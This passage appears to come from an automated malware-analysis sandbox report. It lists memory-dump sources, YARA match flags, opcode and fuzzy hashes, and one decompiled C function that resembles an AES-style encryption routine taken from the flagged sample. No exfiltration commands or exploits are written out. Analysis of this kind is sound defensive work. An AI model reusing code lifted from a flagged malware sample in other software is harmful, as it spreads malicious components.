                                                                                                                                                    0x0040901a
                                                                                                                                                    0x0040901d
                                                                                                                                                    0x00409020
                                                                                                                                                    0x00409029
                                                                                                                                                    0x0040902c
                                                                                                                                                    0x0040903f
                                                                                                                                                    0x00409042
                                                                                                                                                    0x0040904c
                                                                                                                                                    0x0040904f
                                                                                                                                                    0x00409051
                                                                                                                                                    0x0040905a
                                                                                                                                                    0x0040905d
                                                                                                                                                    0x00409070
                                                                                                                                                    0x00409076
                                                                                                                                                    0x00409079
                                                                                                                                                    0x00409080
                                                                                                                                                    0x00409082
                                                                                                                                                    0x00409085
                                                                                                                                                    0x00409088
                                                                                                                                                    0x0040908b
                                                                                                                                                    0x0040908e
                                                                                                                                                    0x00409091
                                                                                                                                                    0x0040909a
                                                                                                                                                    0x0040909f
                                                                                                                                                    0x004090a2
                                                                                                                                                    0x004090a2
                                                                                                                                                    0x004090b5
                                                                                                                                                    0x004090b8
                                                                                                                                                    0x004090bb
                                                                                                                                                    0x004090c2
                                                                                                                                                    0x004090c5
                                                                                                                                                    0x004090c8
                                                                                                                                                    0x004090cb
                                                                                                                                                    0x004090de
                                                                                                                                                    0x004090e1
                                                                                                                                                    0x004090ec
                                                                                                                                                    0x004090ef
                                                                                                                                                    0x004090fb
                                                                                                                                                    0x004090fe
                                                                                                                                                    0x00409104
                                                                                                                                                    0x00409107
                                                                                                                                                    0x0040910a
                                                                                                                                                    0x00409111
                                                                                                                                                    0x00409121
                                                                                                                                                    0x00409124
                                                                                                                                                    0x0040912a
                                                                                                                                                    0x0040912d
                                                                                                                                                    0x00409134
                                                                                                                                                    0x00409136
                                                                                                                                                    0x00409139
                                                                                                                                                    0x0040913c
                                                                                                                                                    0x0040913f
                                                                                                                                                    0x00409142
                                                                                                                                                    0x00409149
                                                                                                                                                    0x00409158
                                                                                                                                                    0x0040915b
                                                                                                                                                    0x00409162
                                                                                                                                                    0x00409165
                                                                                                                                                    0x00409168
                                                                                                                                                    0x0040916b
                                                                                                                                                    0x0040916e
                                                                                                                                                    0x00409171
                                                                                                                                                    0x00409174
                                                                                                                                                    0x0040917d
                                                                                                                                                    0x0040918e
                                                                                                                                                    0x00409196
                                                                                                                                                    0x0040919c
                                                                                                                                                    0x0040919f
                                                                                                                                                    0x004091a1
                                                                                                                                                    0x004091a4
                                                                                                                                                    0x004091a7
                                                                                                                                                    0x004091b4

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 0-3887548279
                                                                                                                                                    • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                    • Instruction ID: f1d44c302487b103660306cd6987bb60b95c699b99aa7ff381766033f9a4755f
                                                                                                                                                    • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                    • Instruction Fuzzy Hash: 6E022DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009657C3, Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                    • Opcode ID: 24c657dbf3089fcbc3069487bc2d4dcf8c450b22064808c1fb65845edcaa17d0
                                                                                                                                                    • Instruction ID: 5a13112b5b60793b016dad8c01efd7471f1a7678a229c8b43cf1ae29a91c0be4
                                                                                                                                                    • Opcode Fuzzy Hash: 24c657dbf3089fcbc3069487bc2d4dcf8c450b22064808c1fb65845edcaa17d0
                                                                                                                                                    • Instruction Fuzzy Hash: 7CA1F471A142597ADF28DF60CC51BFE37A9AB89300F0444A9F98ADB1D1CA78CD90DB21
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0097A634, Relevance: .8, Instructions: 785COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 21aa6bbc0f4bda43ce5bbaff706d9fa8ce8b07e4294fc91ff0d692a2162ed66b
                                                                                                                                                    • Instruction ID: cb7506e227862238d5991bc60b852181aa03ce0decc1a5996ed629a79c8549df
                                                                                                                                                    • Opcode Fuzzy Hash: 21aa6bbc0f4bda43ce5bbaff706d9fa8ce8b07e4294fc91ff0d692a2162ed66b
                                                                                                                                                    • Instruction Fuzzy Hash: 28629D7390864AEFCF15CF08D4915AEFB72BE91308B49C658C8AE27614D331BA54CBD2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00976540, Relevance: .7, Instructions: 652COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                                                                                                                                                    • Instruction ID: 8105c557ab85b7292f4c61937c43d24a40909692a6b6dd5c4a593eb44872254c
                                                                                                                                                    • Opcode Fuzzy Hash: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                                                                                                                                                    • Instruction Fuzzy Hash: 6C128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009B443E, Relevance: .6, Instructions: 565COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b525b9b666084e335a4569960ff88ebcf0135099d38931e4193af1fc78e5fb25
                                                                                                                                                    • Instruction ID: a2d283f86352e6815e766c083d5e5df24958e9568a9cfc61ac9e2a0ceacc3ef8
                                                                                                                                                    • Opcode Fuzzy Hash: b525b9b666084e335a4569960ff88ebcf0135099d38931e4193af1fc78e5fb25
                                                                                                                                                    • Instruction Fuzzy Hash: 5C327871D002199FDB25CF98C981BEEFBF5FF48320F14805AE895AB252D735A941DBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00932305, Relevance: .5, Instructions: 528COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1a148ec388c7b9d855703bec02c48c5bb008866656cb2cbda7f965fdc7a3d739
                                                                                                                                                    • Instruction ID: c5cee7f5ce8fb9b152c2bd095c22f94d8f706f843f3a8c04520ab531923684fa
                                                                                                                                                    • Opcode Fuzzy Hash: 1a148ec388c7b9d855703bec02c48c5bb008866656cb2cbda7f965fdc7a3d739
                                                                                                                                                    • Instruction Fuzzy Hash: C402D333D497B34B8B754EF940E052A7EA49E01A9071F87E8DCD03F296C11ADD0A9AE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0095286D, Relevance: .5, Instructions: 460COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cf014ebfecd0816658a8b827884426e65abc2e2a4d10e42598612816e1e102b1
                                                                                                                                                    • Instruction ID: 432d24d9c599931c0eeb24bb01ec662d30019a8061cf22fbab00b3c26cab9e8d
                                                                                                                                                    • Opcode Fuzzy Hash: cf014ebfecd0816658a8b827884426e65abc2e2a4d10e42598612816e1e102b1
                                                                                                                                                    • Instruction Fuzzy Hash: 5502AF3190012A9BCF34DF55C8887B9B3B8FF59301F5480EAE949A7291E7398ED5DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402FB0, Relevance: .4, Instructions: 435COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 26%
                                                                                                                                                    			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}



















                                                                                                                                                    0x00402fb0
                                                                                                                                                    0x00402fbf
                                                                                                                                                    0x00402fc8
                                                                                                                                                    0x00402fd6
                                                                                                                                                    0x00402fda
                                                                                                                                                    0x00402fe3
                                                                                                                                                    0x00402ff4
                                                                                                                                                    0x00402ff7
                                                                                                                                                    0x00402ffc
                                                                                                                                                    0x00403005
                                                                                                                                                    0x00403013
                                                                                                                                                    0x00403018
                                                                                                                                                    0x00403021
                                                                                                                                                    0x00403031
                                                                                                                                                    0x00403051
                                                                                                                                                    0x00403054
                                                                                                                                                    0x00403066
                                                                                                                                                    0x0040306b
                                                                                                                                                    0x00403080
                                                                                                                                                    0x0040309d
                                                                                                                                                    0x004030a0
                                                                                                                                                    0x004030b1
                                                                                                                                                    0x004030c6
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030e9
                                                                                                                                                    0x004030fb
                                                                                                                                                    0x00403119
                                                                                                                                                    0x00403136
                                                                                                                                                    0x00403139
                                                                                                                                                    0x0040314b
                                                                                                                                                    0x00403160
                                                                                                                                                    0x00403166
                                                                                                                                                    0x0040316e
                                                                                                                                                    0x0040316f
                                                                                                                                                    0x00403172
                                                                                                                                                    0x00403180
                                                                                                                                                    0x00403190
                                                                                                                                                    0x004031a2
                                                                                                                                                    0x004031b4
                                                                                                                                                    0x004031d0
                                                                                                                                                    0x004031e3
                                                                                                                                                    0x004031f0
                                                                                                                                                    0x00403201
                                                                                                                                                    0x00403218
                                                                                                                                                    0x0040323a
                                                                                                                                                    0x0040323d
                                                                                                                                                    0x0040324e
                                                                                                                                                    0x00403269
                                                                                                                                                    0x00403280
                                                                                                                                                    0x00403283
                                                                                                                                                    0x00403295
                                                                                                                                                    0x0040329d
                                                                                                                                                    0x004032b2
                                                                                                                                                    0x004032cf
                                                                                                                                                    0x004032d2
                                                                                                                                                    0x004032e3
                                                                                                                                                    0x00403307
                                                                                                                                                    0x00403317
                                                                                                                                                    0x0040331a
                                                                                                                                                    0x0040332c
                                                                                                                                                    0x00403344
                                                                                                                                                    0x00403347
                                                                                                                                                    0x0040335a
                                                                                                                                                    0x00403367
                                                                                                                                                    0x00403379
                                                                                                                                                    0x00403391
                                                                                                                                                    0x004033b4
                                                                                                                                                    0x004033b7
                                                                                                                                                    0x004033c9
                                                                                                                                                    0x004033de
                                                                                                                                                    0x004033e4
                                                                                                                                                    0x004033e4
                                                                                                                                                    0x004033e7
                                                                                                                                                    0x004033e7
                                                                                                                                                    0x00403180
                                                                                                                                                    0x0040344b
                                                                                                                                                    0x00403454
                                                                                                                                                    0x00403462
                                                                                                                                                    0x004034c0
                                                                                                                                                    0x004034c9
                                                                                                                                                    0x004034d7
                                                                                                                                                    0x00403539
                                                                                                                                                    0x00403542
                                                                                                                                                    0x0040354f
                                                                                                                                                    0x00403552
                                                                                                                                                    0x0040359e
                                                                                                                                                    0x004035aa
                                                                                                                                                    0x004035b3
                                                                                                                                                    0x004035c0
                                                                                                                                                    0x004035c7

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                    • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                                                                                                                                    • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                    • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009D2622, Relevance: .4, Instructions: 398COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2a61477ce728e541a100c0fac9215fcef5cc3b96bf1a96e5004b2b31d9527221
                                                                                                                                                    • Instruction ID: e8c84bb2d4f5f8afefa0f1fd419ce237b4136d90c61af4907126974827be1750
